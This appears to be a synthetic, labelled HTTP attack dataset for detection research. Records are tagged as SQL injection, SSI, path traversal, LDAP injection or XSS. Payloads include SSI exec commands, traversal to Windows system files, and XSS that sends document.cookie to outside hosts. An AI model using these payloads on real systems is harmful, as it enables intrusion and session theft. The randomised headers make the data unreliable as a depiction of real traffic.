If-Unmodified-Since: Thu, 05 Aug 04 11:55:45 CET
If-Match: *
If-None-Match: *
If-Range: "P@OlARrJA@2O_DM3S"
Max-Forwards: 756
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM dHRqZWRFSzNkcmF0Y2ltNXR0YW10ZzhmbHpuNWRuZGFJc2hlaQ==
Authorization: Basic dFpyaHNlOnJ0bjhPMA==
Range: -99,17-4389
Referer: http://clrrh.fr/dh8e/ihHHa/Iyxehio/iceha/udfh80.aspx
TE: trailers,trailers,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.4 (Windows; U; Windows NT 0.4; ni-an; rv:2.1.2) Gecko/07618239
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/8.5 www.las2ets.jpg
Transfer-Encoding: ooct; eTch5ao=fgtah
Upgrade: Su9qj/8.6, baec/7.2
Warning: 013 22.194.211.11 "8iCne9m5iQhhsaHen19e" 
X-Forwarded-For: 136.2.161.83
X-Serial-Number: 1060683
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46277
Start - Id: 42695
class: SqlInjection
POST /Ni9hsdosxewtdab4bpi/hr.HMOfB/r9lZRFz/sgcOMnfyq0Ql3GI01p/e8RPKK67i1ovTeHmP3WN/linthetuhnoatumolsy/a9ntbsroepEsortdi/3wHupdate.b7KWUjBj/tsN9f/cBtd13l-mJi/anta/qe.jsp? HTTP/1.0
Content-Length: 177
Content-Language: n,dpa6,sH4ceoEr
Content-Encoding: compress
Content-Location: /txaAiw4/waEel6h/xedo/ReaEe.aspx
Content-MD5: OXJHZkhyQW9lZWNwdHM5aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Jun 05 09:25:44 GMT
Last-Modified: Fri, 15 Jul 05 18:58:11 UTC
Host: 103.41.72.197
Connection: noomp0
Accept: video/mpeg;q=0.0, video/*;q=0.8
Accept-Charset: ks_c_5601-1987;q=0.2, ks_c_5601-1987;q=0.0, big5;q=0.6, x-mac-korean
Accept-Encoding: *;q=0.5
Accept-Language: OR   'w1dzzs'   =  'Sim'+'ple'
Cache-Control: max-stale=76
Client-ip: 119.66.139.153
Cookie: Mdindoenrsme=6r;tctjaepgee=rfjexlo&from3eye3%uel;iR3oruuy=47547955;areplacesM-KJdivA=oztnuan4ai6a;a7s=hociMish
Cookie2: $Version="319"
Date: Sun, 06 Apr 08 13:43:34 CET
ETag: "ed7gZa1RArhGPxK5xu5S"
Expect: fiiu=ef9cs;skrerab=nalNw
From: 1nnTne@iveby3la.uk
If-Modified-Since: Wed, 31 Mar 04 01:21:15 CET
If-Unmodified-Since: Mon, 21 Aug 06 18:24:42 UTC
If-Match: *
If-None-Match: "vKaIyUYPy-Y9KuZFv"
If-Range: Thu, 29 Apr 10 24:41:04 UTC
Max-Forwards: 7
MIME-Version: 5.7
Pragma: oe4sr=cn7eevn8
Proxy-Authorization: Digest opaque="bii1e"
Authorization: NTLM eWFubm9pZWVvZTRodXJpZml0aThyZW5wemUzb25hNG9rcnMyRQ==
Range: -04,546226-,740980-
Referer: http://ohefcWc.st/Tilv/talti.mdb
TE: trailers,chunked;q=0.4
User-Agent: aefna (7acvQnh; nlpnzqSG; dtEDCG3knH)
UA-Disp: 446,0818,16
UA-OS: WinNT
UA-Color: color16
Via: 9.4 31.127.85.219, 6.6 164.194.76.229, 8.6 www.oxrviir.gif
Transfer-Encoding: deflate
Upgrade: 7t2On/4.9, aeE/2.7, lxstev/8.6
Warning: 910 www.idcir.shtml "6amsbimteinud6eDrte" 
X-Serial-Number: 0088484140288112965
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0T3z3G2ijpI=179885&npt7t=SoctetP6NwoR&ehardfosbhgiosN=273010769&6ERL6L_=wtlc]t(y&edoe8sniqcd1ioz=e9WmugIZ&9ZAiframe=>taloioT?:var-ioo&fmsnatCcnnei=autoexecmanhEkahcopy

End - Id: 42695
Start - Id: 40028
class: SSI
GET /tY19PwL1quAbO86KoCT/trw/ooyhyFtERososr/fifshutdown80p-zFkiRq/1teoxRettcee/elUy30Kj/f0gupdateq7psIS/ueNmnuosdnuEefe/v_82Z13t7TO1s.i_/eptarEnzf/hd9rnNn/uwloe7b1ahsighEgut.php?r7mclAyrAdr2eTn=cuqynahraoE3E&ehknla6n1p=%3C%21+++%23%3C%21--+++++%23exec+cmd%3D%22id%22--%3E&hacmooit1l8iLrz=bodyre+%24 HTTP/1.0
Host: www.loxwn.it
Connection: daubt
Accept: video/*;q=0.6, image/*, image/*;q=0.5
Accept-Charset: windows-1252, big5
Accept-Encoding: *;q=0.2
Accept-Language: mts-mNoad;q=0.1, nnyedt-fYoiyx, Ikeahma-6slm;q=0.8, n-y, nttdnika-masu3eav;q=0.7
Cache-Control: aomest='OltjcG'
Client-ip: 160.214.20.200
Cookie: ltA5yiorUh=E0utrdan(dinetcat;hNnotnseh9tVd=itge;zt=5135;yoee=ccfdrrlte
Cookie2: $Version="286"
Date: Wed, 20 Sep 06 06:03:18 UTC
ETag: W/"InT@8Fc@jEaB.CC3M5"
Expect: ness
From: bic3us@lb0or.fr
If-Modified-Since: Fri, 19 Feb 10 02:37:38 UTC
If-Unmodified-Since: Fri, 11 May 07 09:56:50 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2743
MIME-Version: 9.8
Pragma: 5=utjsec
Proxy-Authorization: 0uee tt6qsn=eithco
Authorization: NTLM Z2FvdWlhZ3VUcmNpQXNhZWVuYXNlYTBzZXRhbHJuZTNlZQ==
Range: 41683-1312,-3
Referer: /wc4dhce.jpg
TE: deflate;q=0.4,trailers
Trailer: Warning
User-Agent: stpwm (53OOUEkk7C; ob7zoV; ifDwQ0-; ajmV7Xnam; oJms_K)
UA-CPU: Sparc
UA-Disp: 1313,496,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 0.6 www.isiauri.shtml, 8.4 www.tluiIao.jpeg
Transfer-Encoding: deflate
Upgrade: 9gTeo/9.5
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 92.41.36.53
X-Serial-Number: 18116
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40028
Start - Id: 44953
class: PathTransversal
GET /lqWw@YG/Taaeiad.php3?Tebxgt9f=..%2F..%2F..%2Ftatrle%2Fadmin.txt&no=upasswdoarm&hscLsZennnh=e9esb&MFitS3zXm2bihh=6151&vfFXEi9group bySP=pefioahi&l1X35Y46hXuu=u2ntiehEuhbtT&n3at=e+id+systemC%24a&mH5aTrcAwindow.openTpm=nnM&eRttshelns=ve0jtkjro3vo HTTP/1.0
Host: 188.94.121.43
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-cyrillic, x-mac-korean;q=0.7, iso-8859-6, iso-8859-7;q=0.5, iso-8859-8
Accept-Encoding: *
Accept-Language: oh-a
Cache-Control: only-if-cached
Client-ip: 132.242.52.39
Cookie: H5f5Mqvcats=jxiRtmu;abwmfdtsout9eoT=mI+r
Cookie2: $Version="009"
Date: Thu, 22 Oct 09 01:57:12 UTC
ETag: "IgIZEu0vPC7j8.z"
Expect: omotegt
If-Modified-Since: Sun, 28 Mar 10 10:48:02 GMT
If-Unmodified-Since: Fri, 30 Nov 07 04:34:51 GMT
If-Match: "7DZNf81oAYIfxPIXFaN"
If-None-Match: "iQ7FoCUhFbkVaQymC"
If-Range: *
Max-Forwards: 825
MIME-Version: 1.3
Pragma: no-cache
Authorization: Digest nonce
Range: 692467-8,088341-5,956298-14
Referer: http://obAie.it/eewltee/NoIgn/eoaIr/Etalkhd.mpeg
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.1 (Machintosh; U; Mac OS X 4.6; yr-ro; rv:9.8.4) Gecko/93229892
UA-CPU: x86
UA-Pixels: 298x509
Via: HTTP/8.7 www.onda.css
Transfer-Encoding: identity
Upgrade: oatfTn/9.9, osaa5/4.2
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Serial-Number: 9376895954650597
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44953
Start - Id: 35976
class: PathTransversal
GET /isksotRmEsoDaSr/aQ@i/usahrnsh/eOz6Ng7c7/e53/ulQxcrlsejCxrE9.jpg?x5Tutwecesno=baZAzfk_V8&E@ON0tE=m9wrnss%3Do6boot.inicde&dt=bdkeonoouweaa&Zo6J1Bx2NZG-=oRraae2tx HTTP/1.0
Host: www.a6elthrfoy.it
Connection: txtf
Accept: */*;q=0.0
Accept-Encoding: identity, compress;q=0.0, compress;q=0.1, identity;q=0.8, gzip;q=0.7
Accept-Language: rdnh-vsEbn20
Cache-Control: no-store
Cookie: ueeAzdnrr4fhec=..\..\..\..\WINNT\system.ini
Date: Sun, 20 May 07 17:14:22 CET
Expect: 100-continue
If-Unmodified-Since: Mon, 09 Oct 06 18:51:46 GMT
If-None-Match: *
Max-Forwards: 7654
Authorization: 6zaa tgTetvpd=baprQaae
Referer: http://i34Glt.com/Idaiytm/itd9jhjs/ynaro7/S3cu.dll
User-Agent: Mozilla/1.7 (X11; U; SunOS sun4u 1.4; fo-ft; rv:5.4.3) Gecko/35786654
Transfer-Encoding: gzip

null

End - Id: 35976
Start - Id: 41557
class: SqlInjection
GET /nscei6tM/qdhsnas9ueoue1rnc/aL.8yFddnDH/8K7Y/0aetedrico1asyacaton/snetaevls0Alwtfi7e9/auw.png?9yquLhome5ea=%27select+++customer_phone+++%27%7C%7C%27from+customers++++%27%7C%7C%27where++customer_surname%3D%27%27%27%7C%7C+lv_surname%7C%7C%27%27%27+++and+++++customer_type%3D1%27%3B&two=j&wSeOhlslaaxysm=lx2q.jn&sChOPeg8=oigLl9araoairN5l&uzBXV=netcatsd&b55logG.=%29sthxkcobjectosiCj&tAjrm2=233840&p5EaEhyuin=ihnf&s7nassVocme4e=a%3Cdeegron&dd4l=3&UeyooMn=191496&tknrknbaey=eerMgYtD&ktdTt2equqe=510047&sdeu30t=r%27yy&ohbedeimmiw=%7Ecatbinenn HTTP/1.1
Host: 180.74.207.86:053
Connection: keep-alive
Accept: application/x-tar;q=0.6, video/mpeg;q=0.2
Accept-Charset: x-mac-chinesetrad, windows-1253, windows-1250
Accept-Encoding: 
Accept-Language: sie-6eds;q=0.8, Tn4iir-norroi;q=0.8, 6e-Enei, rt5vDdh-ws2Ylsyf
Cache-Control: max-stale
Client-ip: 199.164.138.183
Cookie: oataja=11;crnl8f1r6=alogs1txvar&nn ui;rhal=o=ot:;rpp=actthiueamyerc;lhtaccesoM9brcp6WfjL=saxGUGKZXlQ;oIeeuaormhOMk=%u(tsleve9hlee
Cookie2: $Version="9"
Date: Wed, 11 Oct 06 09:38:19 CET
Expect: vnri
From: esfthi@adoaa.it
If-Modified-Since: Wed, 11 Aug 04 09:30:16 CET
If-Unmodified-Since: Tue, 16 Sep 08 24:49:56 GMT
If-Match: "FygmEZWjRtgXz2-"
If-None-Match: "uPLbWqf_LxolL2Yj"
If-Range: Wed, 18 Oct 06 20:51:30 GMT
Max-Forwards: 425
MIME-Version: 4.7
Pragma: qmen=s
Proxy-Authorization: NTLM ZWVpdXM4bnZlckFpYW5tMXRoY3JicjJwZEd0TG91bnlBV2F4dXM=
Authorization: Basic VDBkZTphbzNUaGM=
Range: 4-728143
Referer: /tDdsse.sh
TE: gzip,deflate
Trailer: Accept-Language
User-Agent: Mozilla/3.6 (X11; U; Unix 3.6; th-rn; rv:1.2.6) Gecko/29007929
UA-OS: Win95
UA-Pixels: 9596x5714
Via: HTTP/1.3 www.ehFYs7ne.shtml, 0.4 18.45.192.180, FTP/4.9 39.166.25.99
Transfer-Encoding: efaLut
Upgrade: 1uitte/1.5, Ore6/5.0
Warning: 924 www.tl2tn2r.tiff:1735 "i0edcChnth5mercmaxie" "Sat, 07 Feb 09 03:06:52 CET"
X-Forwarded-For: 166.15.230.232
----: --------------------------------

null

End - Id: 41557
Start - Id: 45081
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: www.kttirirte.uk
Connection: hNpoei
Accept: */*;q=0.6
Accept-Charset: iso-8859-4;q=0.3
Accept-Encoding: deflate;q=0.6, gzip
Accept-Language: sk2O5Xeh-En, sorErd8-ntG4l, kr-eda;q=0.2, o-e9st, Eh-eir;q=0.1
Cache-Control: min-fresh=6
Client-ip: 11.179.164.13
Cookie: Sand@uBstyle=602505
Cookie2: $Version="8"
Date: Mon, 14 Feb 05 21:11:30 GMT
ETag: W/"ripDnExYI_q8e4R"
Expect: hn3ir5=6tmi9da;eeo5ers=cHndst
From: hn2w6xt1@ocg8cedowl.net
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Mon, 20 Mar 06 13:02:50 GMT
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: *
If-Range: "dE-XGHqUO90YpYkq"
Max-Forwards: 54
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="lEha"
Authorization: NTLM c3NjbjRtUHNhbnRhcGFnT2VpdHVzbmVvZWR3YXNxbU1yYW9lcmdlZQ==
Range: 51016-,-10087
Referer: /9veuXa9/qeNOqred.bin
TE: trailers,chunked
Trailer: Connection
User-Agent: iZ8D55i http://www.wrsi6m.st
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 003x764
Via: nUesgh/3.3 37.182.118.48, 6.9 146.127.238.175, 6.2 83.234.242.10
Transfer-Encoding: gzip
Upgrade: tTRadh/8.4, hsrdna/9.0, cgtlfu/8.3
Warning: 437 www.epd64fo.jpeg "eNe3tlcu" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 324503957971792
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45081
Start - Id: 37317
class: LdapInjection
GET /doaltc/gHobjectzhf92fqF3@h/berEial7nmoEae/9lHslrutasstuo/nonwrtnUeoaae/htaccesprocessing-instruction7Jf80Mat0/lG1KlDccX/Sfus5/xsSoe5bE4ed/lYnz-KNbK0.@O.tiff?nbitNgr=dis%25&a7entghunr=oBuDnO_t.Zx&a9sse=569490&DNI@rVo_2ZCv=8798219&ttezrsit6tru=Birvr&NeBREN0SacF=903702673&oygh9OjTdw=8s%26eadRecehhh HTTP/1.0
Host: 231.251.15.49
Connection: hoduk
Accept: image/*;q=0.9, image/*, audio/x-wav;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 163.171.38.168
Cookie: e8iddu=488;eeeitatJReaoioS=806
Cookie2: $Version="95"
Date: Mon, 06 Jun 05 18:37:54 UTC
ETag: "SqzTXG3cL_LrKvg7K"
Expect: 100-continue
From: rtec@se2cehaQn.com
If-Modified-Since: Mon, 08 Mar 04 08:01:04 GMT
If-Unmodified-Since: Wed, 30 Mar 05 10:25:29 UTC
If-Match: *
If-None-Match: "r4@o@yIuyqTyNzVgc@sS"
If-Range: "pdoHUpwqfO.s4MJwGbFR"
Max-Forwards: 8901
MIME-Version: 4.9
Pragma: u='au5shhl'
Proxy-Authorization: Basic bmNlYWVudW06b2lvb2Fh
Authorization: NTLM dHJvdHR6c2FFcGk5YXQ3c3dzY25pWWR5eHk3ZTh0bnNhZXFpYWx4bm8=
Range: 1-568088,6956-8,075-
Referer: http://1e6asdnc.st/i7jepiae/hrVel6oa/yWots2/htcs.css
TE: chunked;q=0.4,trailers,gzip
Trailer: Host
User-Agent: fvl)(|   (aeisr=*)
UA-CPU: StrongARM
UA-Disp: 050,5091,32
UA-Color: color16
Via: 8.3 100.197.150.40, 6.7 www.8hAe.tiff, HTTP/2.7 www.nauUrl.shtml
Transfer-Encoding: gzip
Upgrade: cgnl/2.0
Warning: 537 241.108.176.114:3 "suareips" 
X-Forwarded-For: 220.106.136.48
X-Serial-Number: 8290332205189510
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 37317
Start - Id: 38188
class: LdapInjection
GET /ulcahnT6.htm?skolriAgsnAy4=ssee7ah%400d&4nleR=ev4vxJCLhFA&9arimeby=qyWn4Ksq&I@G7r5C=sgbreiveehtwS&g6sorh1tsau=ra&phee=+lh&eisltr=oLwAvjG&rpal0zz5o4estyN=t%3D46%3Cei+li+jf&pu1nRedr=%29++%28%7C+++%28dhcdh%3Dtkt*%29 HTTP/1.0
Host: www.qbl21js.uk
Connection: 2piswaim
Accept: */*;q=0.5
Accept-Charset: gb2312, x-mac-icelandic, windows-1253, iso-2022-jp;q=0.2, windows-1250;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=42
Client-ip: 186.3.228.230
Cookie: hwcuyaoeots5= hy;hrr2enaspmsW=ty
Cookie2: $Version="50"
Date: Tue, 13 Jan 04 17:26:28 GMT
ETag: W/"cvMbx4sfux4.USQJj"
Expect: ni4g=eota
From: nethi@otsenrjp.biz
If-Modified-Since: Thu, 31 Aug 06 21:36:03 GMT
If-Unmodified-Since: Wed, 04 Jun 08 21:23:40 UTC
If-Match: "PCpCyEr4wBxZbGeJS"
If-None-Match: "rcGcf5-ncVqlFbK8"
If-Range: *
Max-Forwards: 818
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: rlgd pkAree=ohoel
Authorization: Basic b3JucTpiUkV2ZTduZA==
Range: -49,281-
Referer: http://gpnpsRos.st/hnteeeo/feedtfr/4twCi.css
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 0.9; zl-wn; rv:0.6.8) Gecko/53034028
UA-CPU: PowerPC
UA-Disp: 747,821,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5505x7135
Via: HTTP/4.9 www.ntt4eA.jpg:06
Transfer-Encoding: deflate
Upgrade: rho/1.8, riptm/6.0
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 092315765
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38188
Start - Id: 47964
class: XSS
GET /eoa5fruxwa7elqoep/4tQQvLAZ3gVmKX/pimass8tEjucvuomj/3cGkwY/neaw/ixS7nP/nN1cSY8fA/rsrm3eeSkaofbtO/NSkupvnnd9sJerh/dtoE/Sece2haehrhgee.exe?ib=89498774&b8ibodyjbgy=%3C%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F246.74.105.86%2Fnaol.aspx%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E&etUvfrtn7ef=c4uxGqx7g&hio=090139 HTTP/1.1
Host: www.rz4rr.ch
Connection: close
Accept: video/*
Accept-Charset: koi8;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 208.53.71.232
Cookie: heeh=yv-
Cookie2: $Version="32"
Date: Sun, 15 Feb 09 20:25:45 UTC
ETag: "09Q5lWaU@8rfp_chN"
Expect: wfi0bT8t=li0ate
From: Yhjae2L@etses6.net
If-Modified-Since: Mon, 26 Jun 06 14:17:24 UTC
If-Unmodified-Since: Mon, 29 Nov 04 11:26:06 CET
If-Match: "ZkjTYvmPtR5.zHh4"
If-None-Match: *
If-Range: *
Max-Forwards: 0841
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: cdaead o0tyni=dtuinus
Authorization: Digest nonce
Range: -51202
Referer: http://www.ansd5ufg.biz/qoo6hi6/aynahsn/hu6s4nA.msf
TE: trailers
Trailer: Accept-Charset
User-Agent: stert/0.7.2.8
UA-CPU: 68000
UA-Disp: 533,4650,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3364x532
Via: HTTP/0.6 154.251.187.152, 8.2 www.narpnnt7.jpg
Transfer-Encoding: gzip
Upgrade: rtapt1/5.2, rgc8o/0.8, sdqf/6.2, htnEe/1.1
Warning: 193 185.105.110.73:7 "etrva5uwtemespwn" "Wed, 04 Oct 06 16:34:42 CET"
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 546551972
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47964
Start - Id: 40305
class: SSI
GET /uasrm/rhiaiolgerIieaTnane/Ht2eqdeecOnBde/l.fjoQaRoakvtgTL3f/tssNs/ei6dchigdni9sihib/eerabp/edeIedoOtSM/tZ0SuRrZQ.css?arxftGseamoop=eh&t5sie6ms5so=scriptmoe7b8oe&yo4csepapeddhel=eupdatera&lcestcactm=oh&o1=M6S0ioi&gEohd=ooieca&rAyHTtq=%3C%21--+%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5CwpsHeoxtch%5Cajio7liRq%5Ceo.exe+++d%3A%5Cev1dr5oD%5Cwww.laveverill.org%5Casrcc%5Cdatabase.mdb+%2Fx++++exporttofoxpro%22--%3E&ese69Hyui=%27h&lba4x=068&tneal=wgemorne&sk=5&chNrnnt=6962518&t6ttertml=teu&nqq49tazsih=825 HTTP/1.1
Host: 247.149.200.248
Connection: sndna
Accept: */*
Accept-Charset: iso-8859-15, iso-8859-5
Accept-Encoding: *;q=0.1
Accept-Language: nxoslr-ep, iED-Oe2oeel;q=0.1
Cache-Control: Bthtyne=d9mau
Client-ip: 34.12.183.217
Cookie: q7uWlQLXI5D=tQWNVisew
Cookie2: $Version="373"
Date: Tue, 29 Jun 04 19:57:26 GMT
ETag: "aZA6H-lbM.cdD6r"
Expect: 100-continue
From: Yphp8ra@sCnoSst6.de
If-Modified-Since: Fri, 20 Feb 09 19:19:36 CET
If-Unmodified-Since: Sat, 19 Apr 08 22:02:03 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Dec 05 07:20:42 CET
Max-Forwards: 5973
MIME-Version: 3.6
Pragma: k1ih5L=eerhtEq
Proxy-Authorization: NTLM MTR2dHIxOWJoZWlrZ2huYWVUc2VubjJlYXhnb2k3ZXQ=
Authorization: NTLM ZW9zcnRmcjVvaWUwbGVyNmxlZWFpN3NhbHRpNjdGZXpvdG5lNGJkNGZlaGVoaW1j
Range: -2115,0045-233,-51
Referer: http://esraeo.biz/Bt4nr/odgs/lg8pes4/snmie00u.doc
TE: deflate;q=0.5,chunked;q=0.9,trailers
Trailer: If-None-Match
User-Agent: tfn3rlase/5.9.5.7
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2184x777
Via: 0.3 78.171.60.206
Transfer-Encoding: identity
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 285 39.249.111.46 "orhrou3Uo8amdcneinui" "Sun, 02 Sep 07 09:37:14 CET"
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40305
Start - Id: 47131
class: XSS
GET /d@UxfMFZ8q9lP2LJCP.asp?4YI8gsR0like=8565&Md5Eioe=tsTloHh+replace%29ljo&do5essv6e2hg=613304&s@_JQ=7012&hdjs84atkred=tmy-Edhuconnect%2B%3Ard&-Iph_kwinntsC1Y8=5&ezKyAh_s5=%27zSpassthru&9Roaiqtln=dY4&eyaernaoltwza6l=oO7wt&Vll9rhr6Nme=edne&Hbdoegeoee=kgzYh&catwylt-xIZi=98509273&nl8ean2wi=%3Cdiv+++style+%3D%22+++binding%3A+url%28%5Bhttp%3A%2F%2Fwww.toaltatr.com%2Fscript%2FAiO.nsf%5D%29%3B%22+++%3E HTTP/1.0
Host: www.nmlas1eof.st
Connection: nnre
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 136.159.131.62
Cookie: gXservicesBr436replacels=e;ssi0yecEhifnri=echoonupasswdepe?ai;mr6i9iygsnl=JtSb@perles+o
Cookie2: $Version="12"
Date: Sat, 05 Jan 08 16:20:46 CET
ETag: "AAuuoYmaPm5p8GnR"
Expect: 100-continue
From: dy0mird@eelb.it
If-Modified-Since: Tue, 15 Apr 08 06:34:26 GMT
If-Unmodified-Since: Sun, 11 Mar 07 24:11:22 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 29 Apr 10 13:06:36 UTC
Max-Forwards: 3
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic b2hIdzRpYXM6U3FxYzdUMw==
Range: -63707,310050-133
Referer: /s76e.asp
TE: gzip
Trailer: TE
User-Agent: v9hpwkHL http://www.ocfi.st
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: 0.4 84.133.35.89:86853, 7.7 www.ittsl4.js:3151, 1.1 84.161.175.210
Transfer-Encoding: yy0as
Upgrade: eixwry/2.2, nei/4.2, gHU/2.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47131
Start - Id: 44950
class: PathTransversal
GET /YDOautoexecMFGE/9Ugmw8i-/tjZq2GO742dRY/rEFp0ekmzsF@/3ti9debeamas/nD2BQBLPtMhKHT/eml3airer9HlT.jpeg?owai5st5ot8mnr=i%3Beehyz&DikTDeiOrfwe=rDo&idgb0jle0o=846706620&a4m4V78p=218228007&nredBoDTteds=doc%28+++file%3A%2F%2F%2Fc%3A%2Fnr%2Fetato.xml++%29 HTTP/1.1
Host: 83.198.58.167
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: weayeT-as;q=0.9, tmS-aelN;q=0.3, diee-rt;q=0.1, eie-Qustry;q=0.4
Cache-Control: max-stale
Client-ip: 155.3.34.105
Cookie: narvosay=rov8;e8snn1=ce<u;lmu=53;4eefi=sWdc77p
Cookie2: $Version="009"
Date: Wed, 21 Dec 05 13:25:42 CET
ETag: W/"eXLaXWzgwViq5Mu"
If-Modified-Since: Sat, 18 Nov 06 08:21:57 UTC
If-Unmodified-Since: Tue, 21 Apr 09 20:04:28 CET
If-Match: *
If-None-Match: "vzFbOm@VeDfPOLH92C"
If-Range: Sat, 29 Jul 06 03:49:58 CET
Max-Forwards: 8601
MIME-Version: 1.3
Pragma: no-cache
Authorization: NTLM Mnk3YW9BaWVhZ3BvdTV1czRuZGxuY3ZyNVNpdGQzeGxhWmVu
Referer: http://www.eyhfied.uk/rei8eft/4nsest/ireoethd.swf
TE: deflate,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 4.4; tt-2a; rv:2.7.8) Gecko/51860923
UA-CPU: StrongARM
UA-Pixels: 298x509
Via: 7.3 109.211.76.111
Transfer-Encoding: compress
Upgrade: oatfTn/9.9, osaa5/4.2
Warning: 890 89.223.20.139:8441 "dEo8yE4ioSfe6tTu6" 
X-Serial-Number: 4503726576
----: ------------------------------------------

null

End - Id: 44950
Start - Id: 47409
class: XSS
GET /ioLnYcmK/Nt2n80sroUm4lnnod.jpg?Taaos1TviiycAP0=%3Ciframe+++++src++++%3D++%22+++vbscript%3A%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.nt.com%2Fcgi-bin%2Fns.cgi%27%2Bdocument.cookie%29%3B%5D++%22++++%3E&csNdi=hgrh8pEorwaanp&@-2_I_rF=te%25Tcascp&ld9dih9htst=3852636306&o7eee=264899 HTTP/1.0
Host: 174.138.211.150
Connection: wrcdreu
Accept: */*
Accept-Charset: x-mac-chinesetrad, x-mac-korean;q=0.4
Accept-Encoding: *
Accept-Language: ji-cbnhsa;q=0.7, bi-i;q=0.0, Dlgxau-uuaie;q=0.2, n89nhia-trEb, net-1y05lnu
Cache-Control: no-transform
Client-ip: 71.102.4.108
Cookie: ndecr9mjemjoSe=lJm;h7zonpTbiIxhioo=vs;stsiET1zr=oltk;g7qiNen2nw5=& g9y;eiepnleohholb=1013683;jri0ptloTo=de4@.gPQs.
Cookie2: $Version="78"
Date: Sun, 21 Mar 10 06:01:04 GMT
ETag: "QC@xK6DAF--MsECTF3G"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Sun, 08 May 05 02:59:54 UTC
If-Unmodified-Since: Wed, 18 Jul 07 07:02:00 UTC
If-Match: *
If-None-Match: "DWaCN5fv8wwLn_7mv1H"
If-Range: Sat, 23 Aug 08 16:30:51 GMT
Max-Forwards: 5
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic ZW5jU3JiaTpwQWFvcmU=
Authorization: Basic ZWVpbzpDSGt6N3R0aw==
Range: 2506-,-467
Referer: http://thbo.cz/bcyd6/cTsfOeWh/rihce0wa/t7Oe.php
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/2.0 (Machintosh; U; Mac OS X 0.9; ui-ui; rv:2.3.1) Gecko/84731279
UA-CPU: StrongARM
UA-Disp: 815,562,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1670x058
Via: FTP/4.5 14.95.43.253
Transfer-Encoding: deflate
Upgrade: sEtli/1.4, eqt/6.4, eixu/1.5
Warning: 029 www.8bsannTr.png "tiuS0ahxectarQgg" "Sat, 24 Jan 04 03:40:28 GMT"
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 308623860722322067
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

